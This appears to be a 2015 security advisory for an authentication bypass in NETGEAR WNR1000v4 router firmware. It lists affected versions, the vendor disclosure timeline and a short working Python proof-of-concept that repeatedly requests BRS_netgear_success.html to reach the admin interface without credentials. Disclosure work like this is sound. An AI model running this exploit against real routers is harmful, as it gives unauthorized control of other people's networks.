Home [h4] Exploit Netgear Wnr1000v4 Authbypass
Post
Cancel

[h4] Exploit Netgear Wnr1000v4 Authbypass

Posted Oct 6, 2015 Updated Nov 5, 2022
By H4
2 min read

Details

Media and Other Mentions

Introduction

Multiple NETGEAR wireless routers [1] are out of the box vulnerable to an authentication bypass attack. No router options has to be changed to exploit the issue. So an attacker can access the administration interface of the router without submitting any valid username and password, just by requesting a special URL several times.

Affected

  • Router Firmware N300_1.1.0.31_1.0.1.img
  • Router Firmware N300-1.1.0.28_1.0.1.img
  • Router Firmware N300-1.1.0.24_1.0.1.img

Tested and confirmed on the WNR1000v4 Router with the mentioned firmwares. Other products may also be vulnerable because the firmware is used in multiple devices

Technical Description

The attacker can exploit the issue by using a browser or writing a simple exploit.

  1. When a user wants to access the web interface, a http basic authentication login process is initiated
  2. If he does not know the username and password he gets redirected to the 401_access_denied.htm file
  3. An attacker now has to call the URL http://[ROUTER-IP]/BRS_netgear_success.html multiple times

After that the adversary can access the administration web interface and there is no username/password prompt

PoC Python Script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

import os
import urllib2
import time
import sys

try:
	first = urllib2.urlopen("http://" + sys.argv[1])
	print "No password protection!"
except:
	print "Password protection detected!"
	print "Executing exploit..."
	for i in range(0,3):
		time.sleep(1)
		urllib2.urlopen("http://" + sys.argv[1] + "/BRS_netgear_success.html")

	second = urllib2.urlopen("http://" + sys.argv[1])
	if second.getcode() == 200:
		print "Bypass successfull. Now use your browser to have a look at the admin interface."

Timeline

  • 21.07.2015: Vendor notified per email (security@netgear.com) -> No response
  • 23.07.2015: Vendor notified via official chat support
  • 24.07.2015: Support redirected notification to the technical team
  • 29.07.2015: Requested status update and asked if they need further assistance -> No response
  • 21.08.2015: Notified vendor that we will go full disclosure within 90 days if they do not react
  • 03.09.2015: Support again said that they will redirect it to the technical team
  • 03.09.2015: Netgear sent some beta firmware version to look if the vulnerability is fixed
  • 03.09.2015: Confirmed to Netgear that the problem is solved in this version -> Asked Netgear when they plan to release the firmware with this security fix
  • 11.09.2015: Response from Netgear saying they will not disclose the patch release day
  • 15.09.2015: Asked Netgear again when they plan to publish the security fix for the second time -> No response
  • 29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
  • 06.10.2015: Forced public release of this advisory to follow up on [2]

References

This post is licensed under CC BY 4.0 by the author.
Recently Updated